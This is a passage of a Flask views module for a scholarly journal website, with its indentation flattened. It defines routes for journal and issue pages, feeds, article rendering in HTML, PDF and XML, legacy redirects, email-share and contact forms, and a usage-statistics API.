issues = controllers.get_issues_by_jid(journal.jid, is_public=True)
last_issue = issues[0] if issues else None
articles = controllers.get_articles_by_iid(last_issue.iid, is_public=True)
feed = AtomFeed(journal.title,
feed_url=request.url,
url=request.url_root,
subtitle=utils.get_label_issue(last_issue))
feed_language = session.get('lang', get_locale())
feed_language = feed_language[:2].lower()
for article in articles:
# ######### TODO: Revisar #########
article_lang = feed_language
if feed_language not in article.languages:
article_lang = article.original_language
feed.add(article.title or _('Artigo sem título'),
render_template("issue/feed_content.html", article=article),
content_type='html',
id=article.doi or article.pid,
author=article.authors,
url=url_external('main.article_detail_v3',
url_seg=journal.url_segment,
article_pid_v3=article.aid,
lang=article_lang),
updated=journal.updated,
published=journal.created)
return feed.get_response()
@main.route("/journal/<string:url_seg>/about/", methods=['GET'])
@cache.cached(key_prefix=cache_key_with_lang)
def about_journal(url_seg):
language = session.get('lang', get_locale())
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
latest_issue = utils.fix_journal_last_issue(journal)
if latest_issue:
latest_issue_legend = descriptive_short_format(
title=journal.title, short_title=journal.short_title,
pubdate=str(latest_issue.year), volume=latest_issue.volume, number=latest_issue.number,
suppl=latest_issue.suppl_text, language=language[:2].lower())
else:
latest_issue_legend = None
page = controllers.get_page_by_journal_acron_lang(journal.acronym, language)
context = {
'journal': journal,
'latest_issue_legend': latest_issue_legend,
'last_issue': latest_issue,
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper()) for study_area in journal.study_areas
],
}
if page:
context['content'] = page.content
if page.updated_at:
context['page_updated_at'] = page.updated_at
return render_template("journal/about.html", **context)
@main.route("/journals/search/alpha/ajax/", methods=['GET', ])
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def journals_search_alpha_ajax():
if not request.is_xhr:
abort(400, _('Requisição inválida. Deve ser por ajax'))
query = request.args.get('query', '', type=str)
query_filter = request.args.get('query_filter', '', type=str)
page = request.args.get('page', 1, type=int)
lang = get_lang_from_session()[:2].lower()
response_data = controllers.get_alpha_list_from_paginated_journals(
title_query=query,
query_filter=query_filter,
page=page,
lang=lang)
return jsonify(response_data)
@main.route("/journals/search/group/by/filter/ajax/", methods=['GET'])
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def journals_search_by_theme_ajax():
if not request.is_xhr:
abort(400, _('Requisição inválida. Deve ser por ajax'))
query = request.args.get('query', '', type=str)
query_filter = request.args.get('query_filter', '', type=str)
filter = request.args.get('filter', 'areas', type=str)
lang = get_lang_from_session()[:2].lower()
if filter == 'areas':
objects = controllers.get_journals_grouped_by('study_areas', query, query_filter=query_filter, lang=lang)
elif filter == 'wos':
objects = controllers.get_journals_grouped_by('subject_categories', query, query_filter=query_filter, lang=lang)
elif filter == 'publisher':
objects = controllers.get_journals_grouped_by('publisher_name', query, query_filter=query_filter, lang=lang)
else:
return jsonify({
'error': 401,
'message': _('Parámetro "filter" é inválido, deve ser "areas", "wos" ou "publisher".')
})
return jsonify(objects)
@main.route("/journals/download/<string:list_type>/<string:extension>/", methods=['GET', ])
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def download_journal_list(list_type, extension):
if extension.lower() not in ['csv', 'xls']:
abort(401, _('Parámetro "extension" é inválido, deve ser "csv" ou "xls".'))
elif list_type.lower() not in ['alpha', 'areas', 'wos', 'publisher']:
abort(401, _('Parámetro "list_type" é inválido, deve ser: "alpha", "areas", "wos" ou "publisher".'))
else:
if extension.lower() == 'xls':
mimetype = 'application/vnd.ms-excel'
else:
mimetype = 'text/csv'
query = request.args.get('query', '', type=str)
data = controllers.get_journal_generator_for_csv(list_type=list_type,
title_query=query,
extension=extension.lower())
timestamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
filename = 'journals_%s_%s.%s' % (list_type, timestamp, extension)
response = Response(data, mimetype=mimetype)
response.headers['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
@main.route("/<string:url_seg>/contact", methods=['POST'])
def contact(url_seg):
if not request.is_xhr:
abort(403, _('Requisição inválida, deve ser ajax.'))
if utils.is_recaptcha_valid(request):
form = forms.ContactForm(request.form)
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal.enable_contact:
abort(403, _('Periódico não permite envio de email.'))
recipients = journal.editor_email
if form.validate():
sent, message = controllers.send_email_contact(recipients,
form.data['name'],
form.data['your_email'],
form.data['message'])
return jsonify({'sent': sent, 'message': str(message),
'fields': [key for key in form.data.keys()]})
else:
return jsonify({'sent': False, 'message': form.errors,
'fields': [key for key in form.data.keys()]})
else:
abort(400, _('Requisição inválida, captcha inválido.'))
@main.route("/form_contact/<string:url_seg>/", methods=['GET'])
def form_contact(url_seg):
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
context = {
'journal': journal
}
return render_template("journal/includes/contact_form.html", **context)
# ###################################Issue#######################################
@main.route('/grid/<string:url_seg>/')
def issue_grid_legacy(url_seg):
return redirect(url_for('main.issue_grid', url_seg=url_seg), 301)
@main.route('/j/<string:url_seg>/grid')
@cache.cached(key_prefix=cache_key_with_lang)
def issue_grid(url_seg):
journal = controllers.get_journal_by_url_seg(url_seg)
if not journal:
abort(404, _('Periódico não encontrado'))
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
# idioma da sessão
language = session.get('lang', get_locale())
# A ordenação padrão da função ``get_issues_by_jid``: "-year", "-volume", "-order"
issues_data = controllers.get_issues_for_grid_by_jid(journal.id, is_public=True)
latest_issue = issues_data['last_issue']
if latest_issue:
latest_issue_legend = descriptive_short_format(
title=journal.title, short_title=journal.short_title,
pubdate=str(latest_issue.year), volume=latest_issue.volume, number=latest_issue.number,
suppl=latest_issue.suppl_text, language=language[:2].lower())
else:
latest_issue_legend = None
context = {
'journal': journal,
'last_issue': issues_data['last_issue'],
'latest_issue_legend': latest_issue_legend,
'volume_issue': issues_data['volume_issue'],
'ahead': issues_data['ahead'],
'result_dict': issues_data['ordered_for_grid'],
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper()) for study_area in journal.study_areas
],
}
return render_template("issue/grid.html", **context)
@main.route('/toc/<string:url_seg>/<string:url_seg_issue>/')
def issue_toc_legacy(url_seg, url_seg_issue):
if url_seg_issue and "ahead" in url_seg_issue:
return redirect(url_for('main.aop_toc', url_seg=url_seg), code=301)
return redirect(
url_for('main.issue_toc',
url_seg=url_seg,
url_seg_issue=url_seg_issue),
code=301)
@main.route('/j/<string:url_seg>/i/<string:url_seg_issue>/')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def issue_toc(url_seg, url_seg_issue):
section_filter = None
goto = request.args.get("goto", None, type=str)
if goto not in ("previous", "next"):
goto = None
if goto in (None, "next") and "ahead" in url_seg_issue:
# redireciona para `aop_toc`
return redirect(url_for('main.aop_toc', url_seg=url_seg), code=301)
# idioma da sessão
language = session.get('lang', get_locale())
if current_app.config["FILTER_SECTION_ENABLE"]:
# seção dos documentos, se selecionada
section_filter = request.args.get('section', '', type=str).upper()
# obtém o issue
issue = controllers.get_issue_by_url_seg(url_seg, url_seg_issue)
if not issue:
abort(404, _('Número não encontrado'))
if not issue.is_public:
abort(404, ISSUE_UNPUBLISH + _(issue.unpublish_reason))
# obtém o journal
journal = issue.journal
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
# completa url_segment do last_issue
utils.fix_journal_last_issue(journal)
# goto_next_or_previous_issue (redireciona)
goto_url = goto_next_or_previous_issue(
issue, request.args.get('goto', None, type=str))
if goto_url:
return redirect(goto_url, code=301)
# obtém os documentos
articles = controllers.get_articles_by_iid(issue.iid, is_public=True)
if articles:
# obtém TODAS as seções dos documentos deste sumário
sections = sorted({a.section.upper() for a in articles if a.section})
else:
# obtém as seções dos documentos deste sumário
sections = []
if current_app.config["FILTER_SECTION_ENABLE"] and section_filter != '':
# obtém somente os documentos da seção selecionada
articles = [a for a in articles if a.section.upper() == section_filter]
# obtém PDF e TEXT de cada documento
has_math_content = False
for article in articles:
article_text_languages = [doc['lang'] for doc in article.htmls]
article_pdf_languages = [(doc['lang'], doc['url']) for doc in article.pdfs]
setattr(article, "article_text_languages", article_text_languages)
setattr(article, "article_pdf_languages", article_pdf_languages)
if 'mml:' in article.title:
has_math_content = True
# obtém a legenda bibliográfica
issue_bibliographic_strip = descriptive_short_format(
title=journal.title, short_title=journal.short_title,
pubdate=str(issue.year), volume=issue.volume, number=issue.number,
suppl=issue.suppl_text, language=language[:2].lower())
context = {
'this_page_url': url_for(
'main.issue_toc',
url_seg=url_seg,
url_seg_issue=url_seg_issue),
'has_math_content': has_math_content,
'journal': journal,
'issue': issue,
'issue_bibliographic_strip': issue_bibliographic_strip,
'articles': articles,
'sections': sections,
'section_filter': section_filter,
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper()) for study_area in journal.study_areas
],
'last_issue': journal.last_issue
}
return render_template("issue/toc.html", **context)
def goto_next_or_previous_issue(current_issue, goto_param):
if goto_param not in ["next", "previous"]:
return None
all_issues = list(
controllers.get_issues_by_jid(current_issue.journal.id, is_public=True))
if goto_param == "next":
selected_issue = utils.get_next_issue(all_issues, current_issue)
elif goto_param == "previous":
selected_issue = utils.get_prev_issue(all_issues, current_issue)
if selected_issue in (None, current_issue):
# nao precisa redirecionar
return None
try:
url_seg_issue = selected_issue.url_segment
except AttributeError:
return None
else:
return url_for('main.issue_toc',
url_seg=selected_issue.journal.url_segment,
url_seg_issue=url_seg_issue)
def get_next_or_previous_issue(current_issue, goto_param):
if goto_param not in ["next", "previous"]:
return current_issue
all_issues = list(
controllers.get_issues_by_jid(current_issue.journal.id, is_public=True))
if goto_param == "next":
return utils.get_next_issue(all_issues, current_issue)
return utils.get_prev_issue(all_issues, current_issue)
@main.route('/j/<string:url_seg>/aop')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def aop_toc(url_seg):
section_filter = request.args.get('section', '', type=str).upper()
aop_issues = controllers.get_aop_issues(url_seg) or []
if not aop_issues:
abort(404, _('Artigos ahead of print não encontrados'))
goto = request.args.get("goto", None, type=str)
if goto == "previous":
url = goto_next_or_previous_issue(aop_issues[-1], goto)
if url:
redirect(url, code=301)
journal = aop_issues[0].journal
if not journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(journal.unpublish_reason))
utils.fix_journal_last_issue(journal)
articles = []
for aop_issue in aop_issues:
_articles = controllers.get_articles_by_iid(
aop_issue.iid, is_public=True)
if _articles:
articles.extend(_articles)
if not articles:
abort(404, _('Artigos ahead of print não encontrados'))
sections = sorted({a.section.upper() for a in articles if a.section})
if section_filter != '':
articles = [a for a in articles if a.section.upper() == section_filter]
for article in articles:
article_text_languages = [doc['lang'] for doc in article.htmls]
article_pdf_languages = [(doc['lang'], doc['url']) for doc in article.pdfs]
setattr(article, "article_text_languages", article_text_languages)
setattr(article, "article_pdf_languages", article_pdf_languages)
context = {
'this_page_url': url_for("main.aop_toc", url_seg=url_seg),
'journal': journal,
'issue': aop_issues[0],
'issue_bibliographic_strip': "ahead of print",
'articles': articles,
'sections': sections,
'section_filter': section_filter,
'journal_study_areas': [
STUDY_AREAS.get(study_area.upper())
for study_area in journal.study_areas
],
# o primeiro item da lista é o último número.
'last_issue': journal.last_issue
}
return render_template("issue/toc.html", **context)
@main.route('/feed/<string:url_seg>/<string:url_seg_issue>/')
@cache.cached(key_prefix=cache_key_with_lang)
def issue_feed(url_seg, url_seg_issue):
issue = controllers.get_issue_by_url_seg(url_seg, url_seg_issue)
if not issue:
abort(404, _('Número não encontrado'))
if not issue.is_public:
abort(404, ISSUE_UNPUBLISH + _(issue.unpublish_reason))
if not issue.journal.is_public:
abort(404, JOURNAL_UNPUBLISH + _(issue.journal.unpublish_reason))
journal = issue.journal
articles = controllers.get_articles_by_iid(issue.iid, is_public=True)
feed = AtomFeed(journal.title or "",
feed_url=request.url,
url=request.url_root,
subtitle=utils.get_label_issue(issue))
feed_language = session.get('lang', get_locale())
for article in articles:
# ######### TODO: Revisar #########
article_lang = feed_language
if feed_language not in article.languages:
article_lang = article.original_language
feed.add(article.title or 'Unknow title',
render_template("issue/feed_content.html", article=article),
content_type='html',
author=article.authors,
id=article.doi or article.pid,
url=url_external('main.article_detail_v3',
url_seg=journal.url_segment,
article_pid_v3=article.aid,
lang=article_lang),
updated=journal.updated,
published=journal.created)
return feed.get_response()
# ##################################Article######################################
@main.route('/article/<regex("S\d{4}-\d{3}[0-9xX][0-2][0-9]{3}\d{4}\d{5}"):pid>/')
@cache.cached(key_prefix=cache_key_with_lang)
def article_detail_pid(pid):
article = controllers.get_article_by_pid(pid)
if not article:
article = controllers.get_article_by_oap_pid(pid)
if not article:
abort(404, _('Artigo não encontrado'))
return redirect(url_for('main.article_detail_v3',
url_seg=article.journal.acronym,
article_pid_v3=article.aid))
def render_html_from_xml(article, lang, gs_abstract=False):
logger.debug("Get XML: %s", article.xml)
if current_app.config["SSM_XML_URL_REWRITE"]:
result = fetch_data(use_ssm_url(article.xml))
else:
result = fetch_data(article.xml)
xml = etree.parse(BytesIO(result))
generator = HTMLGenerator.parse(
xml, valid_only=False, gs_abstract=gs_abstract, output_style="website")
return generator.generate(lang), generator.languages
def render_html_from_html(article, lang):
html_url = [html
for html in article.htmls
if html['lang'] == lang]
try:
html_url = html_url[0]['url']
except IndexError:
raise ValueError('Artigo não encontrado') from None
result = fetch_data(use_ssm_url(html_url))
html = result.decode('utf8')
text_languages = [html['lang'] for html in article.htmls]
return html, text_languages
def render_html_abstract(article, lang):
abstract_text = ''
for abstract in article.abstracts:
if abstract['language'] == lang:
abstract_text = abstract["text"]
break
return abstract_text, article.abstract_languages
def render_html(article, lang, gs_abstract=False):
if article.xml:
return render_html_from_xml(article, lang, gs_abstract)
elif article.htmls:
if gs_abstract:
return render_html_abstract(article, lang)
return render_html_from_html(article, lang)
else:
# TODO: Corrigir os teste que esperam ter o atributo ``htmls``
# O ideal seria levantar um ValueError.
return '', []
# TODO: Remover assim que o valor Article.xml estiver consistente na base de
# dados
def use_ssm_url(url):
"""Normaliza a string `url` de acordo com os valores das diretivas de
configuração OPAC_SSM_SCHEME, OPAC_SSM_DOMAIN e OPAC_SSM_PORT.
A normalização busca obter uma URL absoluta em função de uma relativa, ou
uma absoluta em função de uma absoluta, mas com as partes *scheme* e
*authority* trocadas pelas definidas nas diretivas citadas anteriormente.
Este código deve ser removido assim que o valor de Article.xml estiver
consistente, i.e., todos os registros possuirem apenas URLs absolutas.
"""
if url.startswith("http"):
parsed_url = urlparse(url)
return current_app.config["SSM_BASE_URI"] + parsed_url.path
else:
return current_app.config["SSM_BASE_URI"] + url
@main.route('/article/<string:url_seg>/<string:url_seg_issue>/<string:url_seg_article>/')
@main.route('/article/<string:url_seg>/<string:url_seg_issue>/<string:url_seg_article>/<regex("(?:\w{2})"):lang_code>/')
@main.route('/article/<string:url_seg>/<string:url_seg_issue>/<regex("(.*)"):url_seg_article>/')
@main.route('/article/<string:url_seg>/<string:url_seg_issue>/<regex("(.*)"):url_seg_article>/<regex("(?:\w{2})"):lang_code>/')
@cache.cached(key_prefix=cache_key_with_lang)
def article_detail(url_seg, url_seg_issue, url_seg_article, lang_code=''):
issue = controllers.get_issue_by_url_seg(url_seg, url_seg_issue)
if not issue:
abort(404, _('Issue não encontrado'))
article = controllers.get_article_by_issue_article_seg(issue.iid, url_seg_article)
if article is None:
article = controllers.get_article_by_aop_url_segs(
issue.journal, url_seg_issue, url_seg_article
)
if article is None:
abort(404, _('Artigo não encontrado'))
req_params = {
"url_seg": article.journal.acronym,
"article_pid_v3": article.aid,
}
if lang_code:
req_params["lang"] = lang_code
return redirect(url_for('main.article_detail_v3', **req_params))
@main.route('/j/<string:url_seg>/a/<string:article_pid_v3>/')
@main.route('/j/<string:url_seg>/a/<string:article_pid_v3>/<string:part>/')
@cache.cached(key_prefix=cache_key_with_lang)
def article_detail_v3(url_seg, article_pid_v3, part=None):
qs_lang = request.args.get('lang', type=str) or None
qs_goto = request.args.get('goto', type=str) or None
qs_stop = request.args.get('stop', type=str) or None
qs_format = request.args.get('format', 'html', type=str)
gs_abstract = (part == "abstract")
if part and not gs_abstract:
abort(404,
_("Não existe '{}'. No seu lugar use '{}'"
).format(part, 'abstract'))
try:
qs_lang, article = controllers.get_article(
article_pid_v3, url_seg, qs_lang, gs_abstract, qs_goto)
if qs_goto:
return redirect(
url_for(
'main.article_detail_v3',
url_seg=url_seg,
article_pid_v3=article.aid,
part=part,
format=qs_format,
lang=qs_lang,
stop=getattr(article, 'stop', None),
),
code=301
)
except (controllers.PreviousOrNextArticleNotFoundError) as e:
if gs_abstract:
abort(404, _('Resumo inexistente'))
abort(404, _('Artigo inexistente'))
except (controllers.ArticleNotFoundError,
controllers.ArticleJournalNotFoundError):
abort(404, _('Artigo não encontrado'))
except controllers.ArticleLangNotFoundError:
return redirect(
url_for(
'main.article_detail_v3',
url_seg=url_seg,
article_pid_v3=article_pid_v3,
format=qs_format,
),
code=301
)
except controllers.ArticleAbstractNotFoundError:
abort(404, _('Recurso não encontrado'))
except controllers.ArticleIsNotPublishedError as e:
abort(404, "{}{}".format(ARTICLE_UNPUBLISH, e))
except controllers.IssueIsNotPublishedError as e:
abort(404, "{}{}".format(ISSUE_UNPUBLISH, e))
except controllers.JournalIsNotPublishedError as e:
abort(404, "{}{}".format(JOURNAL_UNPUBLISH, e))
except ValueError as e:
abort(404, str(e))
def _handle_html():
citation_pdf_url = None
for pdf_data in article.pdfs:
if pdf_data.get("lang") == qs_lang:
citation_pdf_url = url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article_pid_v3,
lang=qs_lang,
format="pdf",
)
break
website = request.url
if website:
parsed_url = urlparse(request.url)
if current_app.config["FORCE_USE_HTTPS_GOOGLE_TAGS"]:
website = "{}://{}".format('https', parsed_url.netloc)
else:
website = "{}://{}".format(parsed_url.scheme, parsed_url.netloc)
if citation_pdf_url:
citation_pdf_url = "{}{}".format(website, citation_pdf_url)
try:
html, text_languages = render_html(article, qs_lang, gs_abstract)
except (ValueError, NonRetryableError):
abort(404, _('HTML do Artigo não encontrado ou indisponível'))
except RetryableError:
abort(500, _('Erro inesperado'))
text_versions = sorted(
[
(
lang,
display_original_lang_name(lang),
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article_pid_v3,
lang=lang
)
)
for lang in text_languages
]
)
citation_xml_url = "{}{}".format(
website,
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article_pid_v3,
format="xml",
lang=article.original_language,
)
)
context = {
'next_article': qs_stop != 'next',
'previous_article': qs_stop != 'previous',
'article': article,
'journal': article.journal,
'issue': article.issue,
'html': html,
'citation_pdf_url': citation_pdf_url,
'citation_xml_url': citation_xml_url,
'article_lang': qs_lang,
'text_versions': text_versions,
'related_links': controllers.related_links(article),
'gs_abstract': gs_abstract,
'part': part,
}
return render_template("article/detail.html", **context)
def _handle_pdf():
if not article.pdfs:
abort(404, _('PDF do Artigo não encontrado'))
pdf_info = [pdf for pdf in article.pdfs if pdf['lang'] == qs_lang]
if len(pdf_info) != 1:
abort(404, _('PDF do Artigo não encontrado'))
try:
pdf_url = pdf_info[0]['url']
except (IndexError, KeyError, ValueError, TypeError):
abort(404, _('PDF do Artigo não encontrado'))
if pdf_url:
return get_pdf_content(pdf_url)
raise abort(404, _('Recurso do Artigo não encontrado. Caminho inválido!'))
def _handle_xml():
if current_app.config["SSM_XML_URL_REWRITE"]:
result = fetch_data(use_ssm_url(article.xml))
else:
result = fetch_data(article.xml)
response = make_response(result)
response.headers['Content-Type'] = 'application/xml'
return response
if 'html' == qs_format:
return _handle_html()
elif 'pdf' == qs_format:
return _handle_pdf()
elif 'xml' == qs_format:
return _handle_xml()
else:
abort(400, _('Formato não suportado'))
@main.route('/readcube/epdf/')
@main.route('/readcube/epdf.php')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def article_epdf():
doi = request.args.get('doi', None, type=str)
pid = request.args.get('pid', None, type=str)
pdf_path = request.args.get('pdf_path', None, type=str)
lang = request.args.get('lang', None, type=str)
if not all([doi, pid, pdf_path, lang]):
abort(400, _('Parâmetros insuficientes para obter o EPDF do artigo'))
else:
context = {
'doi': doi,
'pid': pid,
'pdf_path': pdf_path,
'lang': lang,
}
return render_template("article/epdf.html", **context)
def get_pdf_content(url):
logger.debug("Get PDF: %s", url)
if current_app.config["SSM_ARTICLE_ASSETS_OR_RENDITIONS_URL_REWRITE"]:
url = use_ssm_url(url)
try:
response = fetch_data(url)
except NonRetryableError:
abort(404, _('PDF não encontrado'))
except RetryableError:
abort(500, _('Erro inesperado'))
else:
mimetype, __ = mimetypes.guess_type(url)
return Response(response, mimetype=mimetype)
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def get_content_from_ssm(resource_ssm_media_path):
resource_ssm_full_url = current_app.config['SSM_BASE_URI'] + resource_ssm_media_path
url = resource_ssm_full_url.strip()
mimetype, __ = mimetypes.guess_type(url)
try:
ssm_response = fetch_data(url)
except NonRetryableError:
abort(404, _('Recurso não encontrado'))
except RetryableError:
abort(500, _('Erro inesperado'))
else:
return Response(ssm_response, mimetype=mimetype)
@main.route('/media/assets/<regex("(.*)"):relative_media_path>')
@cache.cached(key_prefix=cache_key_with_lang)
def media_assets_proxy(relative_media_path):
resource_ssm_path = '{ssm_media_path}{resource_path}'.format(
ssm_media_path=current_app.config['SSM_MEDIA_PATH'],
resource_path=relative_media_path)
return get_content_from_ssm(resource_ssm_path)
@main.route('/article/ssm/content/raw/')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def article_ssm_content_raw():
resource_ssm_path = request.args.get('resource_ssm_path', None)
if not resource_ssm_path:
raise abort(404, _('Recurso do Artigo não encontrado. Caminho inválido!'))
else:
return get_content_from_ssm(resource_ssm_path)
@main.route('/pdf/<string:url_seg>/<string:url_seg_issue>/<string:url_seg_article>')
@main.route('/pdf/<string:url_seg>/<string:url_seg_issue>/<string:url_seg_article>/<regex("(?:\w{2})"):lang_code>')
@main.route('/pdf/<string:url_seg>/<string:url_seg_issue>/<regex("(.*)"):url_seg_article>')
@main.route('/pdf/<string:url_seg>/<string:url_seg_issue>/<regex("(.*)"):url_seg_article>/<regex("(?:\w{2})"):lang_code>')
@cache.cached(key_prefix=cache_key_with_lang)
def article_detail_pdf(url_seg, url_seg_issue, url_seg_article, lang_code=''):
"""
Padrões esperados:
`/pdf/csc/2021.v26suppl1/2557-2558`
`/pdf/csc/2021.v26suppl1/2557-2558/en`
"""
if not lang_code and "." not in url_seg_issue:
return router_legacy_pdf(url_seg, url_seg_issue, url_seg_article)
issue = controllers.get_issue_by_url_seg(url_seg, url_seg_issue)
if not issue:
abort(404, _('Issue não encontrado'))
article = controllers.get_article_by_issue_article_seg(issue.iid, url_seg_article)
if not article:
abort(404, _('Artigo não encontrado'))
req_params = {
'url_seg': article.journal.url_segment,
'article_pid_v3': article.aid,
'format': 'pdf',
}
if lang_code:
req_params['lang'] = lang_code
return redirect(url_for('main.article_detail_v3', **req_params), code=301)
@main.route('/pdf/<string:journal_acron>/<string:issue_info>/<string:pdf_filename>.pdf')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def router_legacy_pdf(journal_acron, issue_info, pdf_filename):
pdf_filename = '%s.pdf' % pdf_filename
journal = controllers.get_journal_by_url_seg(journal_acron)
if not journal:
abort(404, _('Este PDF não existe em http://www.scielo.br. Consulte http://search.scielo.org'))
article = controllers.get_article_by_pdf_filename(
journal_acron, issue_info, pdf_filename)
if not article:
abort(404, _('PDF do artigo não foi encontrado'))
return redirect(
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article.aid,
format='pdf',
lang=article._pdf_lang,
),
code=301
)
@main.route('/cgi-bin/fbpe/<string:text_or_abstract>/')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def router_legacy_article(text_or_abstract):
pid = request.args.get('pid', None)
lng = request.args.get('lng', None)
if not (text_or_abstract in ['fbtext', 'fbabs'] and pid):
# se tem pid
abort(400, _('Requsição inválida ao tentar acessar o artigo com pid: %s' % pid))
article = controllers.get_article_by_pid_v1(pid)
if not article:
abort(404, _('Artigo não encontrado'))
return redirect(
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article.aid,
),
code=301
)
# ###############################E-mail share##################################
@main.route("/email_share_ajax/", methods=['POST'])
def email_share_ajax():
if not request.is_xhr:
abort(400, _('Requisição inválida.'))
form = forms.EmailShareForm(request.form)
if form.validate():
recipients = [email.strip() for email in form.data['recipients'].split(';') if email.strip() != '']
sent, message = controllers.send_email_share(form.data['your_email'],
recipients,
form.data['share_url'],
form.data['subject'],
form.data['comment'])
return jsonify({'sent': sent, 'message': str(message),
'fields': [key for key in form.data.keys()]})
else:
return jsonify({'sent': False, 'message': form.errors,
'fields': [key for key in form.data.keys()]})
@main.route("/form_mail/", methods=['GET'])
def email_form():
context = {'url': request.args.get('url')}
return render_template("email/email_form.html", **context)
@main.route("/email_error_ajax/", methods=['POST'])
def email_error_ajax():
if not request.is_xhr:
abort(400, _('Requisição inválida.'))
form = forms.ErrorForm(request.form)
if form.validate():
recipients = [email.strip() for email in current_app.config.get('EMAIL_ACCOUNTS_RECEIVE_ERRORS') if email.strip() != '']
sent, message = controllers.send_email_error(form.data['name'],
form.data['your_email'],
recipients,
form.data['url'],
form.data['error_type'],
form.data['message'],
form.data['page_title'])
return jsonify({'sent': sent, 'message': str(message),
'fields': [key for key in form.data.keys()]})
else:
return jsonify({'sent': False, 'message': form.errors,
'fields': [key for key in form.data.keys()]})
@main.route("/error_mail/", methods=['GET'])
def error_form():
context = {'url': request.args.get('url')}
return render_template("includes/error_form.html", **context)
# ###############################Others########################################
@main.route("/media/<path:filename>/", methods=['GET'])
@cache.cached(key_prefix=cache_key_with_lang)
def download_file_by_filename(filename):
media_root = current_app.config['MEDIA_ROOT']
return send_from_directory(media_root, filename)
@main.route("/img/scielo.gif", methods=['GET'])
def full_text_image():
return send_from_directory('static', 'img/full_text_scielo_img.gif')
@main.route("/robots.txt", methods=['GET'])
def get_robots_txt_file():
return send_from_directory('static', 'robots.txt')
@main.route("/revistas/<path:journal_seg>/<string:page>.htm", methods=['GET'])
def router_legacy_info_pages(journal_seg, page):
"""
Essa view function realiza o redirecionamento das URLs antigas para as novas URLs.
Mantém um dicionário como uma tabela relacionamento entre o nome das páginas que pode ser:
Página âncora
[iaboutj.htm, eaboutj.htm, paboutj.htm] -> #about
[iedboard.htm, eedboard.htm, pedboard.htm] -> #editors
[iinstruc.htm einstruc.htm, pinstruc.htm]-> #instructions
isubscrp.htm -> Sem âncora
"""
page_anchor = {
'iaboutj': '#about',
'eaboutj': '#about',
'paboutj': '#about',
'eedboard': '#editors',
'iedboard': '#editors',
'pedboard': '#editors',
'iinstruc': '#instructions',
'pinstruc': '#instructions',
'einstruc': '#instructions'
}
return redirect('%s%s' % (url_for('main.about_journal',
url_seg=journal_seg), page_anchor.get(page, '')), code=301)
@main.route("/api/v1/counter_dict", methods=['GET'])
def router_counter_dicts():
"""
Essa view function retorna um dicionário, em formato JSON, que mapeia PIDs a insumos
necessários para o funcionamento das aplicações Matomo & COUNTER & SUSHI.
"""
end_date = request.args.get('end_date', '', type=str)
try:
end_date = datetime.strptime(end_date, '%Y-%m-%d')
except ValueError:
end_date = datetime.now()
begin_date = end_date - timedelta(days=30)
page = request.args.get('page', type=int)
if not page:
page = 1
limit = request.args.get('limit', type=int)
if not limit or limit > 100 or limit < 0:
limit = 100
results = {'dictionary_date': end_date,
'end_date': end_date.strftime('%Y-%m-%d %H-%M-%S'),
'begin_date': begin_date.strftime('%Y-%m-%d %H-%M-%S'),
'documents': {},
'collection': current_app.config['OPAC_COLLECTION']}
articles = controllers.get_articles_by_date_range(begin_date, end_date, page, limit)
for a in articles.items:
results['documents'].update(get_article_counter_data(a))
results['total'] = articles.total
results['pages'] = articles.pages
results['limit'] = articles.per_page
results['page'] = articles.page
return jsonify(results)
def get_article_counter_data(article):
return {
article.aid: {
"journal_acronym": article.journal.acronym,
"pid": article.pid if article.pid else '',
"aop_pid": article.aop_pid if article.aop_pid else '',
"pid_v1": article.scielo_pids.get('v1', ''),
"pid_v2": article.scielo_pids.get('v2', ''),
"pid_v3": article.scielo_pids.get('v3', ''),
"publication_date": article.publication_date,
"default_language": article.original_language,
"create": article.created,
"update": article.updated
}
}
@main.route('/cgi-bin/wxis.exe/iah/')
def author_production():
# http://www.scielo.br/cgi-bin/wxis.exe/iah/
# ?IsisScript=iah/iah.xis&base=article%5Edlibrary&format=iso.pft&
# lang=p&nextAction=lnk&
# indexSearch=AU&exprSearch=MEIERHOFFER,+LILIAN+KOZSLOWSKI
# ->
# //search.scielo.org/?lang=pt&q=au:MEIERHOFFER,+LILIAN+KOZSLOWSKI
search_url = current_app.config.get('URL_SEARCH')
if not search_url:
abort(404, "URL_SEARCH: {}".format(_('Página não encontrada')))
qs_exprSearch = request.args.get('exprSearch', type=str) or ''
qs_indexSearch = request.args.get('indexSearch', type=str) or ''
qs_lang = request.args.get('lang', type=str) or ''
_lang = IAHX_LANGS.get(qs_lang) or ''
_lang = _lang and "lang={}".format(_lang)
_expr = "{}{}".format(
qs_indexSearch == "AU" and "au:" or '', qs_exprSearch)
_expr = _expr and "q={}".format(_expr.replace(" ", "+"))
_and = _lang and _expr and "&" or ''
_question_mark = (_lang or _expr) and "?" or ""
if search_url.startswith("//"):
protocol = "https:"
elif search_url.startswith("http"):
protocol = ""
else:
protocol = "https://"
